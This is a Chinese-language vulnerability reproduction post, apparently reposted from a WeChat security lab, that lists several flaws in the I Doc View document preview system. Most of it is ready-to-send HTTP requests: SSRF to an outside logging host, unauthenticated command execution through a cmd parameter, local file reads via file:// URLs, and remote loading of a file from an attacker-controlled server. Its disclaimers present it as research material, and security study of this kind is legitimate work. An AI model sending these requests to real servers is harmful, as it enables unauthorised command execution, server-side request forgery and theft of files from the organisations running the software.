本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
使用I Doc View在线文档预览功能,用户无需安装任何软件,只需要将文档上传到指定的服务器,即可实现在线预览。预览效果与微软Office打开文档的效果相同甚至更好,预览中不仅保留了文档中所有格式和效果,而且增加了阅读进度条和页面定位等功能
可能导致攻击者能够上传恶意文件并读取服务器上的敏感信息、SSRF漏洞、命令执行、文件读取。
I Doc View<13.10.1_20231115
2.对漏洞进行复现
漏洞1(SSRF)
GET /view/url?url=https://csjpkmrzwn.dgrh3.cn HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
测试DNSlog(漏洞存在)
漏洞2(命令执行)
GET /system/cmd.json?cmd=cd HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
测试cd命令执行(漏洞存在)
漏洞3(文件读取1)
GET /view/qJvqhFt.json?start=1&size=5&url=file:///C:/windows/win.ini&idocv_auth=sapi HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
漏洞3(文件读取2)
GET /view/url?url=file:///C:/windows/win.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
测试读取C:/windows/win.ini(漏洞存在)
漏洞4(文件上传)
基于上述文件读取远程加载文件,达到文件上传的目的
GET /view/qJvqhFt.json?start=1&size=5&url=(vps地址)&idocv_auth=sapi HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
这里用dnslog代替vps证明漏洞存在即可(漏洞存在)
https://api.idocv.com
原文始发于微信公众号(弥天安全实验室):【成功复现】I Doc View在线文档预览系统多漏洞汇总(必看版)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论